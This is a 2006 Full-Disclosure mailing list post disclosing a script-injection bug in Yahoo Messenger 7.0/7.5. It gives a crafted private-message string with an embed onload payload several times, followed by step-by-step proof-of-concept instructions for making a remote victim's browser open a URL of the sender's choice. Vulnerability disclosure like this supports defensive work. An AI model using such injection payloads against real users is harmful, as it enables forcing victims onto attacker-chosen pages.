[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060728121117.45192.qmail@web35302.mail.mud.yahoo.com>
Date: Fri, 28 Jul 2006 12:11:17 +0000 (GMT)
From: Ivan Ivan <ivancool2003@...oo.com.ar>
To: full-disclosure@...ts.grok.org.uk
Subject: Yahoo messenger serious bug
Hi,
I found another vulnerability in yahoo messenger that
if you receive a Private message with this string
"helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
(without quotes) Yahoo messenger open in this case
google.com in the internet explorer of the remote
victim.
Yahoo messenger bug proof of concept:
1. Open messenger and log it.
2. Open a yahoo chat third party like yahelite through
Ymsgr protocol and log it with another account.
3. Send a Pm to the messenger account with this
string: s: helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
4. The remote user will open www.google.com (you can
change)
Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a space
s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
Tested in yahoo messenger 7.0/7.5
Regards.
__________________________________________________
Preguntá. Respondé. Descubrí.
Todo lo que querías saber, y lo que ni imaginabas,
está en Yahoo! Respuestas (Beta).
¡Probalo ya!
http://www.yahoo.com.ar/respuestas
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists